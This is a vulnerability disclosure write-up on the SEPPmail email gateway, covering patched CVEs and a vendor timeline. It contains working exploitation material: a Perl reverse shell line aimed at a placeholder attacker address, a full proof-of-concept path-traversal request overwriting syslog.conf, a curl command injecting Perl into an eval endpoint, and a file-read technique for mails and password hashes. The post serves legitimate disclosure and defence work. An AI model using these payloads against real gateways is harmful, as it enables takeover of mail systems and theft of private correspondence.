TL;DR#

We analyzed the SEPPMail Secure E-Mail Gateway virtual appliance for critical vulnerabilities. This post contains technical details for some of them (full list in Overview):

CVE-2026-2743: Pre-authenticated RCE by exploiting an arbitrary file write in the Large File Transfer (LFT) component. The configuration file /etc/syslog.conf can be written to turn it into an RCE.
CVE-2026-7864, CVE-2026-44127, CVE-2026-44128: GINA V2 contains several critical vulnerabilities such as RCE via Perl-injection and a LFI to read arbitrary mails from the device.

Introduction#

SEPPmail is a widely used E-Mail Gateway for encrypted Mails in the DACH (Germany, Austria, Switzerland) region. There are several thousand public instances on Censys.

Based on the information from an ETH research project that SEPPMail has serious vulnerabilities (SeppMail Release Notes and for example CVE-2026-27441: OS command injection) we decided to further look into the subject since the research project did not look at all components.

SeppMail images can be downloaded for different VMs from the official website here. After we obtained SSH root access to the appliance we extracted the source code. The code was audited by LLM Agents as well as our penetration testers as a side project. We only partially checked the code and our focus was on exploitable critical vulnerabilities. In less than one hour, there were already promising vulnerability candidates: Path traversals, straight code injection and also some false positives.

By default, self-registration is enabled for SeppMail and consequently getting an authenticated session is not a problem.

Overview#

The following vulnerabilities were identified and fixed. Not all vulnerabilities will be mentioned in this post:

Version	Fixed Vulnerability
15.0.2.1	CVE-2026-44128: Unauthenticated Remote Code Execution
15.0.3	CVE-2026-44126: Insecure deserialization
15.0.4	CVE-2026-2743: Arbitrary File Write via Path Traversal upload to Remote Code Execution
15.0.4	CVE-2026-44125: Missing Authorization in GINAv2
15.0.4	CVE-2026-44127: Local File Inclusion (LFI) and Arbitrary File Deletion in GINAv2
15.0.4	CVE-2026-44129: Server-side template injection in GINAv2
15.0.4	CVE-2026-7864: Exposure of Sensitive Information to an Unauthorized Actor in GINAv2

CVE-2026-2743: File Upload Path Traversal to RCE in Exposed Web UI#

The affected component in CVE-2026-2743 is the Large File Transfer (LFT) feature. This is enabled by the majority of customers according to a scan based on Censys data. The affected file.app back-end handles large attachments via chunked uploads which are stored in a temporary session directory before being finalized. The vulnerability identification as well as the exploitation was largely done by gemini-cli in our custom LLM-Agent workflow.

The Primary Vulnerability: Unsanitized Path Traversal#

The core flaw exists in the handle_request function of /v1/file.app. When processing a chunked upload, the application extracts a file parameter directly from the user-supplied JSON payload:

# /v1/file.app
push @{$fileparams->{soapfiles}}, {
    ...
    file => $file->{file} || q{},  # Unsanitized user input
    ...
};
...
my $answer = $message->store_attachments( undef, undef, $fileparams );

This file value is passed to WebMailMessage::store_attachments, which uses it to construct the output path on the filesystem. Because the application performs zero sanitization on this parameter, an attacker can use directory traversal sequences (../) to escape the session directory and write to any location on the appliance writable as the nobody user.

Chaining to RCE#

The nobody user has only very few permissions. Apart from the /tmp and /var there aren’t many but one stood out:

find / -user nobody -perm -u+w
/dev/cuaU0
/etc/syslog.conf
/tmp/trust
/tmp/trust/crldir
/tmp/trust/e0eaaa18777f842eb4fd9a54289f03bca62c28c93bc3a5fe0a9d4f430efef765
/tmp/trust/e0eaaa18777f842eb4fd9a54289f03bca62c28c93bc3a5fe0a9d4f430efef765/9C:EF:ED:B3:3C:24:8D:16:FC:CF:D0:8C:62:CD:44:BC:56:A0:D5:F0
[...]
/tmp/sessions
/tmp/sessions/daemon
/tmp/sessions/web
/tmp/sessions/web/6FmCdKqypnueAJqVfzvCLUu79qwjyZUS
/tmp/sessions/web/6FmCdKqypnueAJqVfzvCLUu79qwjyZUS/db
/tmp/sessions/web/6FmCdKqypnueAJqVfzvCLUu79qwjyZUS/db/__db.001
[...]
/var/lfm
/var/lfm/.keep
/var/lfm/nosync
/var/log/proxylog
/var/log/SMTPD.jobid
/var/log/system
[...]

On the SEPPmail appliance, the nobody user has an unusual and highly sensitive permission: write access to /etc/syslog.conf.

OpenBSD’s syslogd supports piping log messages directly into a command. By exploiting the path traversal to overwrite the system’s syslog configuration, we can execute arbitrary commands.

We can add a line to syslog.conf that pipes any system log message into a Perl-based reverse shell:

*.* |/usr/bin/perl -e 'use Socket;$i="<ATTACKER_IP>";$p=8081;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

The Trigger: `newsyslog`#

A challenge in overwriting /etc/syslog.conf is that syslogd only re-reads its configuration when it receives a SIGHUP signal. A reboot replaces the syslog.conf with the original one, so we checked when this could happen without a reboot and how it could be sped up as a web user.

The appliance uses newsyslog for log rotation (e.g. leading to logfile.0), which runs every 15 minutes via cron. newsyslog rotates files that exceed a size limit and then automatically sends a SIGHUP to syslogd.

cat /var/cron/tabs/root
1-59/15 * * * * /usr/bin/newsyslog >/dev/null 2>/dev/null && ...

By bloating log files like SEPPMaillog which has a 10000kb limit in this case, we can force a rotation and a subsequent config reload. These can be filled by just sending web requests.

cat /etc/newsyslog.conf
[...]
/var/log/SEPPMaillog                                    644        99999     10000       *       Z
[...]

Full PoC Request#

POST /v1/file.app HTTP/1.1
Host: test123123.com
Authorization: Basic NkZtQ2R [...] uNEU=
Content-Type: application/json
Content-Length: 682
Connection: close

{
   "files": [
        {
            "name": "syslog_exploit.txt",
            "file": "../../../../../../../etc/syslog.conf",
            "chunks": [
               {
                    "backref": 0,
                    "offset": 0,
                    "size": 240,
                    "data": "Ki4qIHwgL3Vzci9iaW4vcGVybCAtZSAndXNlIFNvY2tldDskaT0iMTkyLjE2OC4xNzguNDYiOyRwPTgwODE7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9zaCAtaSIpO307Jwoj"
                }
            ]
       }
   ]
}

The content overwrites the beginning of the file:

Once the syslog config is reloaded, the reverse shell is received:

Impact#

The chain allows for a complete takeover of the SEPPmail appliance. Attackers can read all mail traffic and persist indefinitely on the gateway. On these virtual appliances the Blue Teams have usually no visibility.

Only customers with the Large File Transfer license are affected by this. This can be tested by checking if the endpoint https://<gateway>/v1/file.app is reachable.

HTTP Status code 404 ==> not affected

GINA V2: A Fully Functional Web Shell#

GINA is a web interface commonly exposed by SEPPMail instances to facilitate secure email communication with non-SEPPMail users. When an encrypted email is sent, the recipient receives an HTML attachment. Using a password mostly delivered via SMS, the user can then log in to decrypt and view the message through the sender’s GINA interface. The updated GINA v2.x, available since approximately January 2025, fortunately requires explicit activation in the system settings. Because the feature is still under development, the application displays the following warning to administrators before it is enabled:

CVE-2026-44128: Perl Injection#

The new UI under /api.app now supports new features such as the /api.app/template feature. Here we could theoretically upload and test templates or we can leverage it to a fully functional Perl web shell. The application takes the user-supplied upldd parameter and passes it directly into a Perl eval() statement. Because the input is not sanitized or validated, any Perl code injected into this parameter is immediately executed by the server:

sub get_template {
    my ($hr_request, $or_session, $or_webdomain, $hr_env) = @_;
    ...
            if ($hr_request->{params}{upldd}) {
                eval $hr_request->{params}{upldd};

The following request submitted via curl will create a file in the temp directory as a PoC:

curl -k -X POST "https://<TARGET_HOST>/api.app/template" -F "uplde=@/dev/null" -F "upldc=@/dev/null" -F "upldt=@/dev/null" -F "upldd=system('touch /tmp/trust/rce_poc');"

You might wonder why such a critical endpoint doesn’t require authentication. The api.app configuration does specify a nosession => 1 key-value pair for certain endpoints (though notably not for this one). However, the application never actually evaluates this value. Instead of enforcing centralized access control at the routing level, the application relies on each individual API function to manually implement its own authentication checks. The function handling our template endpoint simply lacks this check entirely.

Interestingly, this vulnerability was silently patched sometime after version 15.0.0 (and is confirmed fixed by version 15.0.2.1). We originally stumbled across this flaw purely by accident after opening a directory containing an older version of the application. It is concerning that there is absolutely no mention of this critical security fix anywhere in the official release or patch notes.

CVE-2026-44127: Preview any file and delete its folder#

The new api.app also supports the preview of attachments. The attachment/preview API endpoint accepts an identifier parameter. This can be set to arbitrary locations such as the local LDAP database of the appliance. This way, mails, all users, password hashes, keys, etc. can be exfiltrated.

After extracting we can look at the LDAP database:

After viewing a file via the identifier parameter, remove_folder is called which tries to delete the parent folder of the provided file.

sub preview
{
    my ( $hr_params ) = @_;
    my $s_tempfile = '/tmp/' . uri_unescape( $hr_params->{identifier} );
    $s_tempfile =~ s/["']+//g;
    if ( my $s_data = Webapp::Basics::read_file( $s_tempfile ) ) {
        my $s_mime_type = Webapp::Basics::read_file( $s_tempfile . '.info' );
        $s_tempfile =~ s/\/[^\/]+$//;
        Webapp::Basics::remove_folder( $s_tempfile );

As the process is running as the user nobody, most directories can not be deleted.

CVE-2026-7864: Debug Features#

The /api.app/hello endpoint is available without authentication and supports some handy debug features. By simply appending the op=env parameter to the URL, the server dumps all of its environment variables. A simple GET request to /api.app/hello?op=env forces the server to return the complete environment variable list:

Disclosure Timeline#

Date	Event
12.02.2026	First Vulnerability report submitted (CVE-2026-2743)
16.02.2026	Second Vulnerability report submitted
18.02.2026	Asking, if they have received the second report.
20.02.2026	Sending the second report again, as it got lost somewhere (it was in the mail attachment)
02.03.2026	Third Vulnerability report submitted
05.03.2026	Release of first CVE (CVE-2026-2743)
08.05.2026	Release of all other CVEs, but one was missing.
15.05.2026	Acknowledgment from SeppMail that they overlooked the vulnerability described in the third report, which can lead to RCE. This vulnerability is not included in this blog post.

Conclusion#

With rather moderate effort and partially AI-assisted by using LLM agents, similarly to other recent vulnerability research from Andris Suter-Dörig, we were able to discover multiple critical vulnerabilities in the widely used SeppMail secure email solution. Even widely adopted publicly exposed solutions contain critical exploitable findings over a long period of time. These vulnerabilities could have been exploited to read all mail traffic or as an entry vector into the internal network. Blue Teams are usually blind on these virtual appliances.

This demonstrates that it is of utmost importance to implement and enforce continuous and thorough security review practises. With the fast rising capabilities of LLM agents, this is even more important as the required time and skill to identify and exploit these vulnerabilities is sinking drastically.